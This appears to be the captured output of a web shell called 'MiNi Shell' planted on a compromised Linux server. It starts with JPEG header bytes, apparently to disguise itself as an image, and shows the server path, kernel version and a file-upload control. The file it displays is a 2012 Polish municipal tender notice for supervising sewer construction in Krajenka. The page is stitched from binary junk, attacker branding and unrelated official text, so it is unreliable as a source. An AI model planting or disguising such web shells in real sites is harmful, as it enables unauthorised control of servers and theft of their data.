JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120423/128704-N-2012.html

<p class="kh_header"><b>Krajenka: Nadzór inwestorski nad zadaniem pn. Ochrona wód zlewni rzeki Noteć - aglomeracja Krajenka</b><br>
<b>Numer ogłoszenia: 128704 - 2012; data zamieszczenia: 23.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Krajenka , ul. Władysława Jagiełły 9, 77-430 Krajenka, woj. wielkopolskie, tel. 067 2639204 w. 24, 2639205, faks 067 2639203.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.krajenka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nadzór inwestorski nad zadaniem pn. Ochrona wód zlewni rzeki Noteć - aglomeracja Krajenka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest pełnienie funkcji inspektora nadzoru inwestorskiego nad realizacją zadania pn. Ochrona wód zlewni rzeki Noteć - aglomeracja Krajenka -  obejmującego budowę kanalizacji sanitarnej i przykanalików w mieście Krajenka i jednostkach osadniczych na terenie gminy Krajenka.
2.Zakres robót budowlanych objętych umową o wykonanie robót budowlanych  obejmuje budowę:
-kanalizacji sanitarnej grawitacyjnej - 7 819 mb
-kanalizacji sanitarnej ciśnieniowej -  10 129 mb
-kanalizacji sanitarnej podciśnieniowej - 6 538 mb
-przykanalików (grawitacyjnych, ciśnieniowych, podciśnieniowych) - 3 513 mb / 539 szt.
-przepompowni - 19 szt. 
-pompowni przydomowych - 52 szt.
-stacji podciśnieniowo - tłocznych - szt. 2
-studzienek podciśnieniowych zbiorczo - zaworowych wraz z monitoringiem - kpl. 166
-obiektów na istniejącym rurociągu tranzytowym, tj. studni rozprężnych - szt. 10 i osadników - szt. 2 , komór odpowietrzających - szt. 22, komór odwadniających - szt. 20 i komór przewiertowych - szt. 5;
3.Roboty budowlane zostały rozpoczęte w maju 2011 r. Do dnia 30 marca 2012 r. Zamawiający dokonał 4 odbiorów częściowych obejmujących poniższy zakres:
-kanalizacja sanitarna grawitacyjna - 6 885 mb
-kanalizacja sanitarna ciśnieniowa -  5 215 mb
-kanalizacja sanitarna podciśnieniowa - 633 mb
-przykanaliki (grawitacyjne, ciśnieniowe, podciśnieniowe) - 1 163 mb 
-przepompownie - 2 szt. 
-pompownie przydomowe - 1 szt.
-obiekty na rurociągu tranzytowym, tj. studnie rozprężne - szt. 2 i osadniki - szt. 1 , komory odpowietrzające - szt. 1, 
-montaż zbiorników 11 pompowni, 15 komór odwadniających i 16 komór odpowietrzających.
4.Projekt obejmuje 10 jednostek osadniczych PJO 01 Krajenka, PJO 02 Augustowo, PJO 03 Głubczyn Wieś, PJO 04 Głubczyn Letnisko, PJO 05 Głubczyn Rogownica, PJO 06 Skórka, PJO 07 Żeleźnica, PJO 08 Paruszka - Dolnik, PJO 09 Śmiardowo Krajeńskie, PJO 10 Podróżna. 
5.Szczegółowy zakres robót objętych nadzorem określa dokumentacja projektowa (projekt budowlany i rysunki wykonawcze) dostępna na stronie internetowej Zamawiającego www.bip.krajenka.pl w dziale Informacje kategoria Inwestycje bieżące.
6.Zakres świadczonych usług obejmuje pełnienie funkcji inspektora nadzoru inwestorskiego w zakresie 3 branż: sanitarnej, budowlanej i elektrycznej. Zamawiający wyznacza jako koordynatora czynności inspektora nadzoru branży sanitarnej. Łączenie funkcji inspektora nadzoru inwestorskiego i kierownika budowy jest niedopuszczalne.
7. W zakres obowiązków wykonawcy wchodzi:
1)reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem i pozwoleniem na budowę oraz przepisami i zasadami wiedzy technicznej;
2)sprawdzanie jakości wykonywanych robót i wbudowanych wyrobów budowlanych, w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie;
3)sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających,
4)uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych;
5)przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywanie ich do użytkowania,
6)potwierdzanie faktycznie wykonanych robót oraz usunięcia wad;
7)kontrolowanie rozliczeń budowy;
8)wydawanie kierownikowi budowy poleceń (potwierdzone wpisem do dziennika budowy) dotyczących: 
-usunięcia nieprawidłowości lub zagrożeń,
-wykonywania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych,
-przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych i dowodów dopuszczenia do stosowania wyrobów budowlanych oraz urządzeń technicznych,
9)żądanie od kierownika budowy dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót,
10) wstrzymanie dalszych robót budowlanych w przypadku gdy ich kontynuacja może wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z projektem albo z pozwoleniem na budowę.
11)uczestniczenie w naradach technicznych organizowanych przez Zamawiającego 
i kontrola ustaleń z tych narad,
12)informowanie Zamawiającego o wszelkich okolicznościach mogących mieć pływ na terminowość wykonywanych przez wykonawcę robót,
13)pobyt na placu budowy w odstępach czasu zabezpieczających skuteczny 
i prawidłowy nadzór - min.2 razy w tygodniu,
14)doradztwo w negocjacjach z wykonawcą inwestycji,
15)sprawdzenie, potwierdzenie prawidłowości i kompletności dokumentacji rozliczeniowej składanej przez wykonawcę inwestycji oraz dokumentacji powykonawczych,
16)przygotowanie dokumentów wymaganych do zgłoszenia zakończenia budowy do organu nadzoru budowlanego, 
17)współpraca z Zamawiającym w egzekwowaniu postanowień umowy na roboty budowlane,
18)współpraca z Zamawiającym w zakresie dokonywania pełnych rozliczeń końcowych budowy oraz poszczególnych odcinków, zgodnie z wymogami dla nadzorowania inwestycji współfinansowanych ze środków Unii Europejskiej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany zabezpieczyć ofertę wadium w wysokości 3 500 PLN (trzy tysiące pięćset złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunek jeśli w ciągu ostatnich 3 lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwie usługi nadzoru inwestorskiego nad budową kanalizacji sanitarnej o długości minimum 5 km każda, z czego co najmniej jedna obejmująca kanalizację sanitarną podciśnieniową o długości min. 2 km</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunek jeśli dysponuje osobami spełniającymi poniższe wymagania:
- inspektor nadzoru branży sanitarnej - 1 osoba posiadająca uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci kanalizacyjnych bez ograniczeń lub odpowiadające im kwalifikacje zawodowe uznane na zasadach określonych w przepisach odrębnych i  posiadająca 3 lata doświadczenia w branży sanitarnej jako kierownik budowy lub kierownik robót lub inspektor nadzoru inwestorskiego  
- inspektor nadzoru branży budowlanej - 1 osoba posiadająca uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń lub odpowiadające im kwalifikacje zawodowe uznane na zasadach określonych w przepisach odrębnych  i posiadająca 3 lata doświadczenia w branży ogólnobudowlanej jako kierownik budowy lub kierownik robót lub inspektor nadzoru inwestorskiego
- inspektor nadzoru branży elektrycznej - 1 osoba posiadająca uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające im kwalifikacje zawodowe uznane na zasadach określonych w przepisach odrębnych i posiadająca 3 lata doświadczenia w branży elektrycznej jako kierownik budowy lub kierownik robót lub inspektor nadzoru inwestorskiego</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)wypełniony formularz Oferta - załącznik nr 1 do SIWZ,
2)kopia dokumentu potwierdzającego wniesienie wadium,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość wprowadzenia następujących zmian w treści zawartej umowy:
a)zmiana osób pełniących funkcje inspektora nadzoru pod warunkiem posiadania uprawnień budowlanych i doświadczenia zawodowego określonego w warunkach udziału w postępowaniu;
b)w przypadku zmiany stawki podatku VAT na realizowane usługi strony ustalą wysokość wynagrodzenia brutto na pozostały do wykonania zakres usług zgodnie z aktualnie obowiązującą stawką podatku VAT, proporcjonalnie  do ilości dni za które przysługuje wynagrodzenie przypadające na kwartał, w którym nastąpi zmiana stawki podatku. 
2. Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych okoliczności w formie opisowej i właściwie umotywowanej (protokół wraz z uzasadnieniem), przez strony umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.krajenka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy i Miasta w Krajence, ul. Władysława Jagiełły 9,  77-430 Krajenka.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2012 godzina 10:00, miejsce: Urząd Gminy i Miasta w Krajence, ul. Władysława Jagiełły 9,  77-430 Krajenka, sekretariat - parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt finansowany ze środków Unii Europejskiej w ramach Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013 Priorytet III Środowisko Przyrodnicze Działanie 3.4. Gospodarka wodno - ściekowa.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com